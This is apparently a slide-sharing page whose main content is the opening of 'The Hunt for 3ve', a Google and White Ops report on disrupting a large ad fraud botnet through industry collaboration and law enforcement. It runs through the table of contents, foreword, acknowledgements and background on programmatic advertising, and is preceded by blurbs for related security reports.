Taking down a major ad fraud operation through industry collaboration. Every year brings new levels of sophistication and innovation in cybercrime, and the last year was no exception. Over the course of last year, we investigated one of the most complex and sophisticated ad fraud operations we have seen to date. We named this operation “3ve” (pronounced “Eve”), and we’re sharing what we’ve learned from our investigation into its activity with the broader community to promote collaboration in the ongoing fight against cybercrime. These efforts demonstrate how effective cooperation and collaboration across the digital advertising industry can be in curbing ad fraud.
Verizon Publishes 2020 Data Breach Investigation Report (DBIR) With Insights From Thousands of Confirmed Breaches. Verizon's 2020 Data Breach Investigations Report (DBIR) is the most extensive yet, with 81 contributing organizations, and more than 32,000 incidents analyzed (of which 3,950 were confirmed breaches). Credit:Verizon
Credit is due to all original authors and no financial gain was made from the report, Simply sharing an interesting story for educational purposes,
This report is built upon analysis of 41,686 security incidents, of which 2,013 were confirmed data breaches. We will take a look at how results are changing (or not) over the years as well as digging into the overall threat landscape and the actors, actions, and assets that are present in breaches. Windows into the most common pairs of threat actions and affected assets also are provided.
This report solely belongs to Symantec. Credit is due to all original authors and no financial gain was made from the report, Simply sharing for educational purposes,
Verizon Publishes 2020 Data Breach Investigation Report (DBIR) With Insights From Thousands of Confirmed Breaches. Verizon's 2020 Data Breach Investigations Report (DBIR) is the most extensive yet, with 81 contributing organizations, and more than 32,000 incidents analyzed (of which 3,950 were confirmed breaches). Credit:Verizon
Credit is due to all original authors and no financial gain was made from the report, Simply sharing an interesting story for educational purposes,
This report is built upon analysis of 41,686 security incidents, of which 2,013 were confirmed data breaches. We will take a look at how results are changing (or not) over the years as well as digging into the overall threat landscape and the actors, actions, and assets that are present in breaches. Windows into the most common pairs of threat actions and affected assets also are provided.
This report solely belongs to Symantec. Credit is due to all original authors and no financial gain was made from the report, Simply sharing for educational purposes,
White Paper from DVV Solutions and Prevalent Inc. studying the issues regarding third party IT supplier risk and the solutions to effective and efficient Third Party Risk Management for legal firms and suppliers.
company names mentioned herein are for identification and educational purposes only and are the property of, and may be trademarks of, their respective owners.
Detecting Frauds and Identifying Security Challenge | by Money2ConfMoney 2Conf
The Money 2.0 Conference dives into the latest market trends, enterprise risk management strategies, regulatory changes, and FinTech developments in the rapidly-evolving finance and insurance landscape. A three-day conference, it will delve into crucial topics such as the role of blockchain in banking, cybersecurity, digital forensics, spam identification; it will also review investments in emerging markets, money scam and fraud detection, retirement savings, and much more.
Listen to top-notch speakers from well-known organizations who will share their valuable insights and break down the latest developments so that you learn how to manage and grow your wealth in a secure manner! Join us on 18th-20th March 2022 in Dubai, UAE and on April 11th-13th 2022 in Las Vegas, USA.
As the technology is moving forward with an ease, the major issue of security is also getting intense day by day. Here are some of the major things which we had already seen till this 2015, which created a big issues that cannot be ignored at all.
Cost of Cybercrime Study in Financial Services: 2019 Reportaccenture
Now in its 9th year, this new Accenture presentation explores the impact associated with cybercrime, quantifying the cost of cyberattacks and analyzing trends in malicious activities in the financial services industry. And this year for the first time, we look to the future so that financial services organizations can better target their funds and resources and open up new revenue opportunities to unlock economic value.
118 Hacker-Powered Facts From The 2018 Hacker-Powered Security ReportHackerOne
Another year, another Hacker-Powered Security Report! We pulled out 100 of the report’s top facts—and then added 18 more, since it’s 2018. See below for a better understanding of how hacker-powered security is disrupting (in a good way) how organizations approach security. More security teams are adding VDPs, more are supplementing their skills and bandwidth with hackers, and more are augmenting their standard pen tests with hacker challenges.
In 2018, the HackerOne community and those using our platform have combined to crush every metric that we track. Organizations awarded more than $11 million in bounties. Hackers submitted more than 78,000 reports. Bounties were awarded to hackers in over 100 countries.
Unfortunately, the only metric that hasn’t changed much is the percentage of Forbes Global 2000 companies without vulnerability disclosure policies.
Read on for all of the facts!
This year WhiteHat SecurityTM celebrates its fteenth anniversary, and the eleventh year that we have produced the Web Applications Security Statistics Report. The stats shared in this report are based on the aggregation of all the scanning and remediation data obtained from applications that used the WhiteHat SentinelTM service for application security testing in 2015. As an early pioneer in the Application Security Market, WhiteHat has a large and unique collection of data to work with.
An assessment of UK cyber resilience across the commercial sector. The report highlights information disclosure, as used by hackers to construct attack intelligence.
Malware's Most Wanted: Malvertising Attacks on Huffingtonpost, Yahoo, AOLCyphort
Malvertising Attacks on Huffingtonpost, Yahoo, AOL
Cyphort Labs has reported an uptick in drive-by-infection through malvertising in 2014 and sounded alarms for the web property owners regarding this emerging trend. We believe that this trend presents a significant cybersecurity challenge in 2015. In this session, we will discuss this increasing trend of drive-by attacks by dissecting examples of recent web infections, as well as share observed, sophisticated behavior of modern exploit pack and the challenges for research and discovery. As we present exploit kit information, trends and statistics from research derived from our Cyphort Crawler, you will gain an awareness and an understanding of these malvertising threats to better protect your site visitors from malware infection.
Intelligence-Driven Fraud Prevention
This RSA white paper discusses the need for new, intelligence-based approaches to manage fraud across digital channels.
White Paper from DVV Solutions and Prevalent Inc. studying the issues regarding third party IT supplier risk and the solutions to effective and efficient Third Party Risk Management for legal firms and suppliers.
company names mentioned herein are for identification and educational purposes only and are the property of, and may be trademarks of, their respective owners.
Detecting Frauds and Identifying Security Challenge | by Money2ConfMoney 2Conf
The Money 2.0 Conference dives into the latest market trends, enterprise risk management strategies, regulatory changes, and FinTech developments in the rapidly-evolving finance and insurance landscape. A three-day conference, it will delve into crucial topics such as the role of blockchain in banking, cybersecurity, digital forensics, spam identification; it will also review investments in emerging markets, money scam and fraud detection, retirement savings, and much more.
Listen to top-notch speakers from well-known organizations who will share their valuable insights and break down the latest developments so that you learn how to manage and grow your wealth in a secure manner! Join us on 18th-20th March 2022 in Dubai, UAE and on April 11th-13th 2022 in Las Vegas, USA.
As the technology is moving forward with an ease, the major issue of security is also getting intense day by day. Here are some of the major things which we had already seen till this 2015, which created a big issues that cannot be ignored at all.
Cost of Cybercrime Study in Financial Services: 2019 Reportaccenture
Now in its 9th year, this new Accenture presentation explores the impact associated with cybercrime, quantifying the cost of cyberattacks and analyzing trends in malicious activities in the financial services industry. And this year for the first time, we look to the future so that financial services organizations can better target their funds and resources and open up new revenue opportunities to unlock economic value.
118 Hacker-Powered Facts From The 2018 Hacker-Powered Security ReportHackerOne
Another year, another Hacker-Powered Security Report! We pulled out 100 of the report’s top facts—and then added 18 more, since it’s 2018. See below for a better understanding of how hacker-powered security is disrupting (in a good way) how organizations approach security. More security teams are adding VDPs, more are supplementing their skills and bandwidth with hackers, and more are augmenting their standard pen tests with hacker challenges.
In 2018, the HackerOne community and those using our platform have combined to crush every metric that we track. Organizations awarded more than $11 million in bounties. Hackers submitted more than 78,000 reports. Bounties were awarded to hackers in over 100 countries.
Unfortunately, the only metric that hasn’t changed much is the percentage of Forbes Global 2000 companies without vulnerability disclosure policies.
Read on for all of the facts!
This year WhiteHat SecurityTM celebrates its fteenth anniversary, and the eleventh year that we have produced the Web Applications Security Statistics Report. The stats shared in this report are based on the aggregation of all the scanning and remediation data obtained from applications that used the WhiteHat SentinelTM service for application security testing in 2015. As an early pioneer in the Application Security Market, WhiteHat has a large and unique collection of data to work with.
An assessment of UK cyber resilience across the commercial sector. The report highlights information disclosure, as used by hackers to construct attack intelligence.
Malware's Most Wanted: Malvertising Attacks on Huffingtonpost, Yahoo, AOLCyphort
Malvertising Attacks on Huffingtonpost, Yahoo, AOL
Cyphort Labs has reported an uptick in drive-by-infection through malvertising in 2014 and sounded alarms for the web property owners regarding this emerging trend. We believe that this trend presents a significant cybersecurity challenge in 2015. In this session, we will discuss this increasing trend of drive-by attacks by dissecting examples of recent web infections, as well as share observed, sophisticated behavior of modern exploit pack and the challenges for research and discovery. As we present exploit kit information, trends and statistics from research derived from our Cyphort Crawler, you will gain an awareness and an understanding of these malvertising threats to better protect your site visitors from malware infection.
Intelligence-Driven Fraud Prevention
This RSA white paper discusses the need for new, intelligence-based approaches to manage fraud across digital channels.
Very useful description and guidelines from the IAB about traffic fraud and digital ad fraud.
SOURCE: http://www.iab.net/member_center/traffic_of_good_intent_task_force
Top 10 leading fraud detection and prevention solution providersMerry D'souza
CIOLOOK comes up with its edition of Top 10 Leading Fraud Detection and Prevention Solution Providers. Featuring it’s Cover Story is – Kaspersky is to save the world. Kaspersky is a global cybersecurity company founded in 1997 with its roots in antivirus solutions. Its mission is simple: to build a safer world.
Why is cyber security a disruption in the digital economyMark Albala
As we enter the digital economy, companies will quickly realize that the differentiator in the digital economy is information and information being a valuable resource is subject to theft, hacking, phishing and a host of other issues which compromise a company’s ability to participate in the digital economy. Cybersecurity misfires compromise the trust of buyers and partners necessary to participate in the digital economy. It is up to every company to ensure that the information shared with them is protected to the best of their ability and proactively notify persons and organizations who entrust their information necessary to transact business (any personal identity information including but not limited to addresses, credit card information, social security numbers, account information, credit information, medical records, etc.) with any potential compromises which can yield harm to them by that information either being used maliciously or shared with others.
The digital economy is different than other versions of commerce because in the digital economy, information is the lifeblood of digital commerce that passes through the hands of many platforms involved in a digital event. Each of these platforms are an opportunity to wreak havoc on your well-intended but incomplete intents to protect the information contained within the network you control. In the digital economy, it is not only the network you control, but the platforms that touch the personal data entrusted to you as a means of enabling digital commerce, and several techniques have begun to emerge to protect personal information contained within your information domain and the domain of platforms participating in digital commerce.
Because the life blood of the digital economy is information, information hacked in the digital economy is akin to shrinkage in the legacy economy. Both are means to directly attack your bottom line, whether it is redirecting customers elsewhere because they don’t trust your privacy program, ransomware which makes your site or one of your partner platform sites dangerous to use or some other reason which challenges your ability to participate in the digital economy. Shrinking the potential market share because of information safety and security challenges is a disruption, making cyber-security a disruptive activity, particularly if it is not dealt with swiftly.
If your cyber-security program is focused entirely on protecting the information housed in your four walls, you have exposed yourself to problems you will have difficulty in identifying both the source and the entry point of these issues.
BLOG.wedotechnologies.com a is space for sharing knowledge and experiences about Enterprise Business Assurance with voluntary contributions from WeDo Technologies' staff, our customers and special guests.
Read a selections of the best articles published on BLOG.wedotechnologies.com in 2014.
Enjoy it!
Ways To Protect Your Company From Cybercrimethinkwithniche
The Federal Bureau of Investigation FBI saw a 217 percent increase in Cybercrime Reporting between 2008 and 2021. Last year, losses reached almost $7 billion. This is due to a highly skilled cyber-threat supply network that empowers threat actors with limited know-how and limited resources to put at risk personal, economic, and national security.
Security - intelligence - maturity-model-ciso-whitepaperCMR WORLD TECH
A Time of Great Risk: The Time Between Compromise and Mitigation
In most organizations today, threat detection is based on various security sensors that attempt to look for anomalous behavior or for known signatures of malicious activity. These sensors include firewalls, intrusion detection/prevention systems (IDS/IPS), application gateways, anti- virus/anti-malware, endpoint protection, and more. They operate at and provide visibility into all layers of the IT stack.
Ransomware is one of the types of malware which is the result of sophisticated effort to compromise the modern computer structures. In this paper we examine the current history of ransomware and its growth to the recent form of large-scale ransomware attacks (ones that interrupt whole organizations). Within that timeframe, public reporting, articles, and news media reporting on large-scale ransomware attacks is reviewed to create an experimental analysis of ransom payments, circumstances that led to those payments, and if data was eventually recovered through a literature study for the people victimized by ransomware. Increasing threats due to ease of transfer of ransomware over internet are also talk over. Finally, low level awareness among company professionals is confirmed and reluctance to payment on being a victim is found as a common trait.
In a defeat for Google, a federal appellate panel has reinstated a pay-per-click advertiser's claims that the Google misrepresented the effectiveness of its click-fraud detection system. Singh alleged that he hired Oxford BioChronometrics in 2018 to conduct an analysis of some of his ad campaigns, which showed that Google’s filters caught fewer fraudulent clicks than advertised.
The LA Riots & Economics of Urban UnrestJeff Martinez
The Los Angeles riot of 1992 resulted in 52 deaths, 2500 injuries and at least $446 million in property damage; this staggering toll rekindled interest in understanding the underlying causes of the widespread social phenomenon of rioting. We examine the causes of the rioting using international data, evidence from the race riots of the 1960's in the US, and Census data of Los Angeles, 1990. We find some support for the notions that the opportunity costs of time and the potential costs of punishment influence the incidence and intensity of riots. Beyond these individual costs and benefits, community structure matters. In our results, ethnic diversity seems a significant determinant of rioting, while we find little evidence that poverty in the community matters.
Coronavirus Aid, Relief, and Economic Security Act: What Is in It for US Edu...Jeff Martinez
The US government is continuing to respond
to the spread of the Coronavirus disease 2019
(COVID-19) with new actions to provide relief
to students and educators. Late evening on
Wednesday, March 25, the Senate passed the
Coronavirus Aid, Relief, and Economic Security
(CARES) Act – the third piece of legislation
to respond to the COVID-19 pandemic – by a
vote of 96-0. On Friday, March 27, the House
of Representatives passed the bill, which was
signed into law by President Trump the same
day.
With this Declaratory Ruling, we ensure that public health authorities can efficiently and effectively communicate vital health and safety information to the American people. Specifically, we confirm that the COVID-19 pandemic constitutes an “emergency” under the Telephone Consumer Protection Act (TCPA) and that consequently hospitals, health care providers, state and local health officials, and other government officials may lawfully communicate information about the novel coronavirus as well as mitigation measures without violating federal law.
Automate Lawsuit Filing? The Brave New World of "Anti Robocall AppsJeff Martinez
It’s easier than ever for consumers to file TCPA complaints for unwanted calls – between growing awareness and apps that let them file complaints at the touch of the button, the risk of fines is too big to ignore any longer.
As we reflect on 2019, we see some notable shifts in the threat landscape, with businesses facing new levels of complexity
in fraud orchestration. Rather than looking for the quick buck, fraudsters are playing the long game, with multi-step attacks
that do not initially reveal their fraudulent intent.
As the saying goes, ‘money makes the world go round’, and this could not be more true for the cybercrime underworld.
Fraudsters’ unrelenting demand for fresh user credentials provides the financial incentive for cyber attackers carrying out
major data breaches. When fraudsters successfully leverage the spoils from these breaches to make money, they will use
the proceeds to invest in more advanced attack toolkits and greater volumes of stolen data. As a result, organizations find it
increasingly difficult to defend against the barrage of attacks on their websites and apps.
The only sustainable approach to curbing the cybercrime cycle of success is adopting a zero-tolerance approach to fraud
prevention. Tolerating current fraud levels as a 'cost of doing business' exacerbates the problem long-term by providing the
financial incentive for fraudsters. In-depth profiling of activity across customer touchpoints helps organizations facing subtle
attacks that do not show immediate tell-tale signs of fraud. When combined with targeted friction, large-scale attacks
quickly become unsustainable for fraudsters who have become accustomed to circumnavigating systems that avoid putting
up barriers to users.
As the latest data from the Arkose Labs platform show, attack rates are continuously on the rise. Going into 2020, the fraud fighting community needs to finally win back the upper hand against fraudsters, protecting individuals and our society from
the effects of cybercrime.
CB Insights Global Fintech Report Q3 2019Jeff Martinez
Q3’19 fintech funding topped $8.9B, a quarterly record when adjusting for Ant Financial’s $14B investment in Q2’ As of Q3, fintech has raised $24.6B in 2019, already surpassing 2017’s annual total. Funding grew on the back of 19 $100M+ rounds worth approximately $4B in Q3’19.
Deals rebounded slightly in Q3’19 but are likely to fall short of 2018’s record as a result of a continued pullback in early stage investing: Fintech deals in Q3’19 grew 6% from Q2'19, but they have dropped in every quarter in 2019 when compared to the same time frame last year. Early stage (seed/angel and Series A) deals fell to an 11 quarter low and funding hit a 7 quarter low.
The US saw deals dip to an 11 quarter low while Asia saw deals spike and nearly surpass the US in Q3’19: The US saw deals dip as a result of a pull back in early stage deals, which also contributed to the overall drop in 2019 global deals through Q3’19. Asia saw deals rebound as China reclaimed the
lead from India as Asia’s top deal hub.
Southeast Asia fintech topped new annual highs: Southeast Asia set a new annual record with $701M raised across 87 deals through Q3’19 . The top 2 deals since 2015 occurred in 2019: a $100M Series B to Singapore based Deserka and a $100M Series C to Vietnam based MoMo.
India and China continued to battle over the title of Asia’s top fintech hub in Q3’19: China saw deals surge to 55 in the quarter, reclaiming the lead from India with 33 deals. India saw $674M in funding, narrowly pulling ahead of China’s $661M.
Challenger banks have raised over $3B in 2019 YTD and Q3’19 saw $1.3B invested a quarterly funding high: Q3’19 saw challenger banks funding bolstered by rounds to unicorns, including NuBank’s $400M Series F, which was the largest reported equity investment to a challenger bank and made
NuBank the highest valued challenger at $10B. Startup focused challenger banks saw competition heat up with deals to Ramp Financial, Mercury, and Stripe, which launched card issuing.
There are 58 VC backed fintech unicorns worth a combined $213.5B: Q3’19 saw 6 new fintech unicorn births (Hippo, Judo, Deposit Solutions, QuintoAndar, Dave , and C2FO), and 3 more have occurred in Q4’19 as of 11/11/19 (Next Insurance, Ebanx , and Riskified ). Other highly valued unicorns continued to raise late stage capital, including NuBank, Gusto, and Stripe, among others, but none signaled an IPO was imminent.
FinCEN Guidance on Convertible Virtual CurrenciesJeff Martinez
The Financial Crimes Enforcement Network (FinCEN) is issuing this interpretive guidance to remind persons subject to the Bank Secrecy Act (BSA) how FinCEN regulations relating to money services businesses (MSBs) apply to certain business models involving money transmission denominated in value that substitutes for currency, specifically, convertible virtual currencies (CVCs).
Members, Subcommittee on Digital Commerce and Consumer Protection Re: Underst...Jeff Martinez
The Subcommittee on Digital Commerce and Consumer Protection will hold a hearing on Thursday, June 14, 2018, at 10:15 a.m. in 2322 Rayburn House Office Building. The hearing is entitled “Understanding the Digital Advertising Ecosystem.”
US House of Representatives Relies on Oxford BioChronometrics Study for HearingJeff Martinez
British cyber security firm's studies and statement used by Subcommittee on Digital Commerce to form official memorandum for its hearing on the digital advertising ecosystem.
Coffey vs.Ripple Labs Class Action LawsuitJeff Martinez
Taylor-Copeland Law, a firm focused on blockchain and crypto litigation, filed the Ripple lawsuit in California court 5-3-2018 on behalf of Ryan Coffee and other Ripple investors. They allege that Ripple made money by breaking state and federal securities laws and purposefully misleading the public.
Cboe BZX Exchange Cryptocurrency Fund Letter to SECJeff Martinez
Re: Staff Letter: Engaging on Fund Innovation and Cryptocurrency-related Holdings(the “Staff Letter”).
Chris Concannon of Cboe write to SEC. Cboe firmly believes that such holdings do not require significant revisions to the well-established frameworks for evaluation related to valuation, liquidity, custody, arbitrage, and manipulation.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
The Hunt for 3ve
1. 1
The Hunt for 3ve
Taking down a major ad fraud operation through industry collaboration
November 2018
Co-authored by Google and White Ops
with technical contributions by Proofpoint and others
2. The Hunt for 3ve 2
Table of Contents
Foreword ..................................................................................................................................... Page 03
Acknowledgements.................................................................................................................. Page 04
Context and background.......................................................................................................... Page 05
A novel and innovative ad fraud threat .................................................................... Page 05
3ve in a nutshell ........................................................................................................................ Page 06
Operation summary .................................................................................................... Page 06
Discovery and history .............................................................................................................. Page 07
A low-level botnet quickly evolves............................................................................. Page 07
Our knowledge and collaboration expanded .......................................................... Page 07
The 3ve operation ..................................................................................................................... Page 08
3ve.1 ............................................................................................................................... Page 11
3ve.2 ............................................................................................................................... Page 12
3ve.3 ............................................................................................................................... Page 13
Taking 3ve down ....................................................................................................................... Page 14
The industry working group ....................................................................................... Page 14
Indication of a successful takedown........................................................................ Page 14
Uniting the industry against future attacks ............................................................ Page 15
Appendix ..................................................................................................................................... Page 17
3ve.1................................................................................................................................ Page 17
Operating as a proxy in user’s PCs ....................................................................... Page 17
Network communication ....................................................................................... Page 19
3ve.1 C2 handshake ................................................................................................ Page 20
BGP hijacking ........................................................................................................... Page 21
3ve.2 ............................................................................................................................... Page 23
Counterfeit websites................................................................................................ Page 23
Hidden Windows....................................................................................................... Page 27
Fake Browsing Behavior ......................................................................................... Page 27
Mouse movements ................................................................................................. Page 27
Patching functions .................................................................................................. Page 28
Playing media ........................................................................................................... Page 29
Tag evasion ............................................................................................................... Page 30
Non-counterfeit domains browsing ..................................................................... Page 30
C2 Instructions.......................................................................................................... Page 30
Parameters explained........................................................................................ Page 33
Geographic distribution........................................................................................... Page 34
Infected IPs and churn rate ................................................................................... Page 35
3ve.3 ............................................................................................................................... Page 35
3. The Hunt for 3ve 3
Foreword
Every year brings new levels of sophistication and innovation in cybercrime, and the last year was no exception.
Over the course of last year, we investigated one of the most complex and sophisticated ad fraud operations we have seen
to date. We named this operation “3ve” (pronounced “Eve”), and we’re sharing what we’ve learned from our investigation
into its activity with the broader community to promote collaboration in the ongoing fight against cybercrime. These efforts
demonstrate how effective cooperation and collaboration across the digital advertising industry can be in curbing ad fraud.
3ve operated on a massive scale: at its peak, it controlled over 1 million IPs from both residential botnet infections and
corporate IP spaces, primarily in North America and Europe (for comparison, this is more than the number of broadband
subscriptions in Ireland). It featured several unique sub-operations, each of which constituted a sophisticated ad fraud
scheme in its own right. Shortly after we began to identify the massive infrastructure (comprised of thousands of
servers across many data centers) used to host 3ve’s operation, we found similar activity happening within a network
of malware-infected residential computers. These diversified tactics and siloed operations made 3ve’s operators harder
to identify than previous operations we’d encountered, and also allowed the larger fraud enterprise to continue when one
aspect of it was disrupted. Through its varied and complex machinery, 3ve generated billions of fraudulent ad bid requests
(i.e., ad spaces on web pages that advertisers can bid to purchase in an automated way).
3ve’s size and tactics are considerable for an ad fraud operation, but the fact that fraudsters dedicate their time and effort
to developing complex ad fraud schemes is hardly a surprise. Ad fraud has been an attractive cybercrime due to its lucrative
returns and relatively low risk. The primary risk for most fraudsters has been having their operation discovered and shut
down. While that can cost fraudsters thousands – and sometimes millions – of dollars in illicit profits, the prospect of purely
financial losses has not effectively deterred fraudsters from simply starting another operation.
Today marks the culmination of a collaborative effort that enabled us to more thoroughly confront and dismantle 3ve. We
referred our findings to law enforcement, and today the U.S. Department of Justice announced criminal charges tied to 3ve’s
operations. What followed was a collaborative and coordinated effort by both law enforcement and various companies
across industries, including ad tech, cyber security, and Internet service providers, to disable the infrastructure and sinkhole
botnet command and control servers. The result so far has rendered the operation’s botnets unable to continue to drive
fraudulent ad traffic. Protecting the many targets – including our customers – of an operation like 3ve in the context of a
multi-stakeholder working group required patience, dedication, diligence, and endurance. Our core objectives were to detect
and prevent this fraud on behalf of our customers and Internet users, and to cut this operation off from its sources of profit.
While ad fraud continues to represent a challenge to the advertising industry, the action taken today demonstrates that it is a
risky activity with potentially serious consequences for fraudsters. And our efforts won’t stop here — we’re confident that the
industry-wide movement to protect the integrity of the digital advertising economy will continue on.
Per Bjorke
Senior Product Manager, Google
Foreword
Tamer Hassan
Co-Founder & CTO, White Ops
4. The Hunt for 3ve 4
Acknowledgements
This research was conducted by a team of dedicated security professionals. We would like to thank Kafeine from
ProofPoint and the teams at ESET and Malwarebytes, as well as Matt Carothers, F-Secure, Symantec, and Trend Micro
for their collaboration, contributions, and camaraderie in this effort.
We would also like to thank all of the participants in the industry working group: Adobe, Amazon Advertising, CenturyLink,
ESET, Facebook, Fox-IT, F-Secure, Matt Carothers, McAfee, Microsoft Digital Crimes Unit, Oath, Symantec, The Shadowserver
Foundation, The Trade Desk, Trend Micro, and others. Last but not least, we would like to acknowledge and thank the broader
members of our respective teams at Google and White Ops, as their work was critical every step along the way.
Please note that we’ve aimed to strike a balance in this document in terms of sharing technical information that has
utility and excluding additional information that is too sensitive to share publicly. We encourage ad fraud researchers
and other information security professionals to contact us at threatintel@whiteops.com for additional information
that we may be able to disclose on a case-by-case basis.
5. The Hunt for 3ve 5
The world of data science and cybersecurity is nothing
like detective work in the movies. Usually, fraudulent activity
is identified, traced to its source, and then cut off — and
that’s where the vast majority of cases end. Rarely does
corporate ad fraud prevention lead to criminal charges, but
that is exactly what happened with 3ve.
3ve first emerged as a small bot-driven effort that
subsequently grew into a large and sophisticated operation.
As we investigated and battled against it, we began to
better understand the operation and its aggressive
evolution — and realized there were several operations
with some common characteristics. Through our fight, we
found ourselves on a path of discovery, exploration, and
what some might describe as adventure.
Today, digital advertising is primarily bought and sold
through “programmatic” platforms. Publishers agree to
feature ads alongside their content and use Supply Side
Platforms (SSPs) to auction their available ad space,
or inventory, to advertisers. Advertisers use Demand
Side Platforms (DSPs) to bid on that available ad space
based on how successful they think those ads will be in
generating the interest of visitors. These auctions happen
billions of times a day, in the milliseconds before a page
loads on your browser, and inventory can be passed
between many auctions before being matched with an
advertiser who wants to place their ad on your screen.
The ability to sell and purchase digital advertising inventory
programmatically has enabled publishers to maximize
revenues and advertisers to realize a greater return on
investment. Subsequently, programmatic advertising has
rapidly evolved and grown into a multi-billion dollar industry,
increasingly gaining prominence and visibility across the
digital advertising ecosystem. Unfortunately, this increased
prominence has also attracted the attention of tech-savvy
fraudsters, who try to produce fake traffic and fraudulent
ad inventory to trick advertisers into believing that their ads
are being seen by actual, interested users. These fraudsters
attempt to extract small amounts of money from multiple
parties and transactions with the goal of making the losses
appear unconnected — if they’re successful, in aggregate,
these extracted amounts can add up to considerable profits
for the fraudsters.
Because operations like 3ve bring distrust and instability
to the digital advertising ecosystem, we were as thorough
as possible in our efforts to bring it down. In the twists and
turns that followed, we learned valuable lessons about the
tactics and approaches fraudsters try to use to escape the
notice of both their victims and those trying to uncover their
operations, and the signals that will tip us off to similar
operations in the future.
A novel and innovative ad fraud threat
3ve was typical of many ad fraud operations in that it
generated revenue by selling forgeries of two major
assets in high demand from advertisers: human audiences
and premium publisher inventory. But because 3ve was
uniquely effective at counterfeiting the domains of
prestigious publishers and sending droves of bots to false
inventory, it was able to generate a substantial volume
of fake ad bid requests. 3ve also operated at a high level
of sophistication that appeared to be a series of unrelated
operations. Its operators constantly adopted new ways
to disguise 3ve’s bots, allowing the operation to continue
growing even after their traffic was blacklisted. Whenever
they were blocked off in one place, they’d reappear
somewhere else.
Context and background
3ve was typical of many ad fraud operations
in that it generated revenue by selling forgeries
of two major assets in high demand from
advertisers: human audiences and premium
